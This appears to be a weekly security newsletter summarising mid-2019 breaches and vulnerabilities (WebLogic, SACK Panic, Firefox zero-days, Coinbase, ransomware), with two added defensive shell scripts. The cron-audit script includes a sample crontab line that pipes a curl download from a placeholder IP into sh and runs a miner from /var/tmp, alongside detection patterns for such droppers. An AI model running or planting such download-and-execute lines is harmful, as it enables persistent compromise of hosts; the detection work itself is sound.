Polyverse Weekly Breach Report


A snapshot of last week’s reported cybersecurity breaches and vulnerabilities

Oracle WebLogic server

Oracle released an emergency, out-of-cycle update for a deserialization vulnerability in its WebLogic application server (CVE-2019-2729) that attackers were already exploiting. The flaw lets an unauthenticated remote attacker execute arbitrary code on a targeted server, and it is a bypass of the patch Oracle shipped in April for a closely related flaw, so servers patched in April remain exposed until this update is applied. To read more: https://thehackernews.com/2019/06/oracle-weblogic-vulnerability.html

Venmo

A computer-science student scraped 7m Venmo transactions to show that, despite earlier criticism of Venmo’s privacy defaults, users’ transaction histories can still be harvested in bulk through the public API. The student reportedly wanted to alert users to set their accounts to private; Venmo still makes payment activity public by default. To read more: https://techcrunch.com/2019/06/16/millions-venmo-transactions-scraped/

SACK Panic

A flaw known as SACK Panic (CVE-2019-11477) lets a remote, unauthenticated attacker crash a Linux host by sending a crafted sequence of TCP selective acknowledgements (SACKs); kernels from version 2.6.29 onward are affected. It was one of four related TCP flaws reported by a security researcher at Netflix, three in Linux and one in FreeBSD; the others cause resource exhaustion and slowdowns rather than an outright panic. To read more: https://www.theregister.co.uk/2019/06/17/linux_tcp_sack_kernel_crash/
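A triage helper for the SACK flaws, added here as an example and not code from Netflix, the kernel project or the linked article. It checks whether a kernel release number falls in the affected range (2.6.29 and later), whether SACK processing is currently enabled on the host, and prints the two workarounds Netflix published with its advisory for hosts that cannot reboot into a fixed kernel yet. The function names, the dry-run behaviour and the sample release strings are this example's own.

```shell
#!/bin/sh
# Added example (not Netflix's or the kernel project's code): triage helper
# for the TCP SACK flaws. Function names and the dry-run mode are assumptions
# of this example, not anything from the advisory.

# Keep only digits, so "29rc1" or "0+" compare as plain numbers.
digits() { printf '%s' "$1" | tr -dc '0-9'; }

# Print "yes" if a release string (as printed by `uname -r`) is >= 2.6.29,
# the first release the advisory names as affected, else "no".
# Caveat: distributions backport fixes without bumping this number, so "yes"
# means "check your vendor's errata", not "unpatched".
kernel_in_affected_range() {
    rel=${1%%-*}                                # "4.15.0-54-generic" -> "4.15.0"
    maj=$(digits "${rel%%.*}")
    rest=${rel#*.}
    case "$rel" in *.*) ;; *) rest=0 ;; esac   # bare "5" -> treat as 5.0.0
    min=$(digits "${rest%%.*}")
    case "$rest" in
        *.*) pat=${rest#*.}; pat=$(digits "${pat%%.*}") ;;
        *)   pat=0 ;;                            # "5.0" -> 5.0.0
    esac
    maj=${maj:-0}; min=${min:-0}; pat=${pat:-0}
    if   [ "$maj" -gt 2 ];  then echo yes
    elif [ "$maj" -lt 2 ];  then echo no
    elif [ "$min" -gt 6 ];  then echo yes
    elif [ "$min" -lt 6 ];  then echo no
    elif [ "$pat" -ge 29 ]; then echo yes
    else                         echo no
    fi
}

# Report whether SACK processing is on, reading the knob behind
# `sysctl net.ipv4.tcp_sack`. Prints enabled, disabled or unknown.
sack_status() {
    if [ -r /proc/sys/net/ipv4/tcp_sack ]; then
        case "$(cat /proc/sys/net/ipv4/tcp_sack)" in
            1) echo enabled ;;
            0) echo disabled ;;
            *) echo unknown ;;
        esac
    else
        echo unknown
    fi
}

# Execute the command when WORKAROUND_MODE=apply, otherwise just show it.
run_or_echo() {
    if [ "$WORKAROUND_MODE" = apply ]; then "$@"; else echo "would run: $*"; fi
}

# The two workarounds Netflix published with its advisory: turn SACK
# processing off, or drop TCP segments advertising a tiny MSS. Dry-run by
# default; pass "apply" to execute (needs root).
# Caveats: disabling SACK costs throughput on lossy paths; the MSS filter
# drops legitimate peers that really use a tiny MSS, and it only helps while
# net.ipv4.tcp_mtu_probing is 0 (the kernel default).
sack_workarounds() {
    WORKAROUND_MODE=${1:-dry-run}
    run_or_echo sysctl -w net.ipv4.tcp_sack=0
    run_or_echo iptables  -I INPUT -p tcp -m tcpmss --mss 1:500 -j DROP
    run_or_echo ip6tables -I INPUT -p tcp -m tcpmss --mss 1:500 -j DROP
}

echo "kernel $(uname -r): in affected range: $(kernel_in_affected_range "$(uname -r)")"
echo "SACK processing: $(sack_status)"
sack_workarounds "${1:-dry-run}"
```

Run it without arguments to see the host's status and the commands that would be applied; run it with `apply` as root to install the workarounds. Prefer the patched kernel over either workaround wherever a reboot is possible, and remove the iptables rules once you have rebooted.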

IoT devices

New research found that security cameras are compromised more often than any other class of internet-of-things device, accounting for 47% of all compromised devices in the data set. Smart hubs and network-attached storage devices were the next most frequently compromised. Note that this measures how often devices are successfully attacked, not how many flaws each device type contains. To read more: https://www.zdnet.com/article/cybersecurity-these-are-the-internet-of-things-devices-that-are-most-targeted-by-hackers/

Twitter

Twitter took down almost 5,000 fake accounts as part of its effort to remove state-backed accounts that spread propaganda. Most of the accounts appeared to be backed by Iran and had tweeted content that, according to Twitter, “benefited the diplomatic and geostrategic views of the Iranian state.” To read more: https://www.infosecurity-magazine.com/news/twitter-shutters-5000-1/

Mermaids UK

Mermaids UK, a British charity that supports gender-diverse and transgender youth, suffered a data breach that exposed messages between the charity and parents of transgender children. More than 1,000 pages of confidential emails were exposed. To read more: https://www.zdnet.com/article/mermaids-transgender-charity-apologizes-for-data-breach/

Oregon State University

Oregon State University disclosed a data breach that may have exposed personal information belonging to students and their families. The intrusion, in which an employee’s email account was compromised, occurred in May, but the university has only now revealed that 636 student records containing personally identifiable information were at risk. To read more: https://www.zdnet.com/article/oregon-state-university-breach-exposed-student-family-data/

WiFi extender

A security researcher at IBM X-Force found a firmware flaw in a TP-Link Technologies WiFi range extender. By sending a crafted HTTP request to the device, an unauthenticated remote attacker can execute arbitrary shell commands on it with root privileges. To read more: https://www.cyberscoop.com/wi-fi-extenders-remote-code-ibm-xforce/

LinkedIn

LinkedIn removed the profile of a well-connected but non-existent “person” named Katie Jones. Presented as a Russia and Eurasia fellow at a top think tank, the profile appears to have used an AI-generated deepfake photo, and the account was likely created to connect with and spy on policy professionals on LinkedIn. To read more: https://nakedsecurity.sophos.com/2019/06/17/id-like-to-add-you-to-my-professional-network-of-people-to-spy-on/

Firefox

Mozilla released an update for Firefox to address a critical vulnerability (CVE-2019-11707) that attackers were actively exploiting. The type-confusion bug in the browser’s JavaScript engine lets an attacker who lures a victim to a malicious page run code inside the browser; on its own it does not escape the browser sandbox, which is why a second fix followed. To read more: https://threatpost.com/mozilla-patches-firefox-critical-flaw-under-active-attack/145814/

Firefox redux

Mozilla released its second Firefox update within the week, this time for a sandbox-escape vulnerability (CVE-2019-11708). Chained with the type-confusion flaw patched days earlier, it lets a remote attacker break out of the browser’s content sandbox and execute arbitrary code on the victim’s computer; both bugs were used together in the attack on Coinbase described below. To read more: https://thehackernews.com/2019/06/firefox-0day-vulnerability.html

Check out Have I Been Pwned to see if any of your accounts have been exposed by the above breaches.

GandCrab ransomware decryption

Bitdefender, working with law-enforcement agencies, released an updated free decryption tool for GandCrab ransomware that victims can use to recover their files without paying; the update extends coverage to the latest GandCrab versions. GandCrab has infected more than 1.5m computers. To read more: https://thehackernews.com/2019/06/gandcrab-ransomware-decryption-tool.html

Coinbase

A spear-phishing campaign against Coinbase employees attempted to exploit the two Firefox vulnerabilities reported this week, before either was patched. Coinbase’s security team detected the attack, blocked it and reported the exploit to Mozilla, which is how the sandbox-escape bug came to light. Had the attempt succeeded, the attacker could have gained a foothold on employee machines and from there access to Coinbase’s back-end network to steal funds from the exchange. The attack targeted employees, not Coinbase customers. To read more: https://www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/

John Deere

John Deere, the American maker of agricultural machinery, handed out promotional USB drives at a conference that, when plugged in, register as a keyboard, inject keystrokes and open the company’s official website in the user’s browser. The drives did nothing harmful, but this is exactly how malicious keystroke-injection devices work, and it is a good reminder that an unknown USB device should never be plugged into a work machine. To read more: https://www.vice.com/en_us/article/pajv5k/john-deere-promotional-usb-drive-hijacks-your-keyboard

APT Group Hijacking

Symantec found that Turla, a Russia-linked advanced persistent threat (APT) group, hijacked infrastructure belonging to OilRig, an APT group associated with Iran. This was the first time Symantec has seen one such group take over another’s infrastructure. The takeover surfaced when a computer in a Middle Eastern government organization downloaded a Turla variant of Mimikatz, a credential-stealing tool, from a server previously controlled by OilRig. A caveat for defenders: attribution based on infrastructure alone is unreliable when groups piggy-back on each other’s servers. To read more: https://www.cyberscoop.com/oilrig-turla-symantec-apt-infrastructure/

Cryptominer

A new cryptomining malware gains persistence on Linux by installing cron jobs that re-download and re-run the miner, so deleting the miner binary alone does not clean the host. The chain starts with a malicious Bash script dropped on the server, which fetches the miner and writes the cron entries; cleanup therefore has to remove the cron entries and the dropper as well as the binary. To read more: https://www.bleepingcomputer.com/news/security/cryptominer-uses-cron-to-reinfect-linux-host-after-removal/
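An audit helper for the cron-based reinfection described above, added here as an example; it is not code from the article or from the malware analysis it links. It flags cron entries that look like re-download hooks (curl or wget piped into a shell, inline base64 decoding, binaries run from world-writable temp directories, or an every-minute schedule) and can walk the usual cron locations on a live host. The match patterns, the cron paths and the sample crontab are this example's own assumptions; the sample uses a documentation IP address, not a real command-and-control server.

```shell
#!/bin/sh
# Added example (not code from the article or the malware write-up it links):
# find cron entries that re-download and re-run a payload. Patterns and
# paths are assumptions about what such entries usually look like.

# Read cron lines on stdin and print the ones that look like a re-download /
# re-execution hook. A line is flagged when it:
#   - pipes curl/wget output straight into sh or bash,
#   - decodes base64 inline (a common way to hide the stage-2 URL),
#   - runs something out of /tmp, /var/tmp or /dev/shm, or
#   - fires every minute (* * * * *), the schedule droppers favour.
flag_suspicious_cron() {
    grep -E -v '^[[:space:]]*(#|$)' | grep -E \
        -e '(curl|wget).*\|[[:space:]]*(ba)?sh([[:space:]]|$)' \
        -e 'base64[[:space:]]+(-d|--decode)' \
        -e '(/tmp|/var/tmp|/dev/shm)/[^[:space:]]+' \
        -e '^[[:space:]]*\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*' \
        || true            # no match is a normal outcome, not an error
}

# Walk the usual system-wide and per-user cron sources (Debian and RHEL style
# paths assumed) and print "file: entry" for every flagged line. Run as root
# so the per-user spool directories are readable.
scan_cron_sources() {
    for f in /etc/crontab /etc/cron.d/* /etc/cron.hourly/* \
             /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -f "$f" ] || continue
        flag_suspicious_cron < "$f" | awk -v f="$f" '{ print f ": " $0 }'
    done
}

# Constructed sample crontab (203.0.113.7 is a documentation address, not a
# real C2). Lines 3 and 5 are modelled on miner droppers; the rest are benign.
SAMPLE_CRONTAB='# m h dom mon dow user command
0 3 * * * root /usr/bin/certbot renew
* * * * * root (curl -fsSL http://203.0.113.7/x.sh || wget -q -O- http://203.0.113.7/x.sh) | sh
*/5 * * * * root /usr/sbin/logrotate /etc/logrotate.conf
@reboot root /var/tmp/.X11/kworker -o pool.example.net:3333'

# Run the sample through the filter; prints only the two dropper lines.
demo_flag_sample() {
    printf '%s\n' "$SAMPLE_CRONTAB" | flag_suspicious_cron
}

if [ "${CRON_AUDIT_SCAN:-0}" = 1 ]; then
    scan_cron_sources      # CRON_AUDIT_SCAN=1 sh cron_audit.sh on a live host
else
    demo_flag_sample
fi
```

Treat a hit as a lead, not a verdict: legitimate backup and deployment jobs sometimes fetch scripts over HTTP too. When a hit is real, remove the cron entry, the dropper script and the miner together, and check `/etc/rc.local`, systemd timers and the attacker's usual `~/.ssh/authorized_keys` additions, since droppers rarely rely on cron alone.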

Dell

Some versions of Dell’s SupportAssist utility contain a privilege-escalation vulnerability (CVE-2019-12280) that lets malware already running as a low-privileged user gain the utility’s system-level privileges. The utility, which runs as SYSTEM to check the health of a system’s hardware and software, loads DLLs without properly validating them, so a DLL planted in a location the utility searches is executed with full privileges. The flawed component is a third-party PC-Doctor module that is also used in other vendors’ diagnostic tools, so the exposure is not limited to Dell machines. To read more: https://thehackernews.com/2019/06/dells-supportassist-hacking.html

Riviera Beach

Riviera Beach, a Florida city, agreed to pay a ransom of about $600,000 to the attackers who had shut down its computer systems three weeks earlier. During that time employees could not access email, emergency dispatchers could not log calls, and workers had to be paid with paper checks. To read more: https://www.washingtonpost.com/business/2019/06/20/florida-city-will-pay-hackers-get-its-computer-systems-back/

Outlook for Android

Microsoft released a patch for its Outlook for Android app that addresses a cross-site scripting (XSS) vulnerability. A specially crafted email message could exploit it to run attacker-controlled script in the context of the app on the targeted device. Technical details of the flaw are not yet public, so update the app rather than waiting for more information. To read more: https://thehackernews.com/2019/06/outlook-app-android.html

NASA

NASA confirmed that its Jet Propulsion Laboratory was hacked. The attackers got in through an unauthorized Raspberry Pi that someone had attached to the JPL network, and from there moved laterally into other parts of NASA’s network. The intrusion, detailed in a NASA Office of Inspector General audit, went undetected for roughly ten months and exposed about 500MB of data, including export-controlled information. To read more: https://www.forbes.com/sites/daveywinder/2019/06/20/confirmed-nasa-has-been-hacked/#367800abdc62

American Medical Collection Agency

American Medical Collection Agency, the medical-billing firm behind a recent data breach that exposed the personal information of 20m Americans, including patients of Quest Diagnostics and LabCorp, filed for bankruptcy. To read more: https://krebsonsecurity.com/2019/06/collections-firm-behind-labcorp-quest-breaches-files-for-bankruptcy/

Want to learn more?

Sign up below and receive these reports and more, directly in your inbox.

The registered trademark Linux® is used pursuant to a sublicense from the Linux Foundation, the exclusive licensee of Linus Torvalds, owner of the mark on a world­wide basis.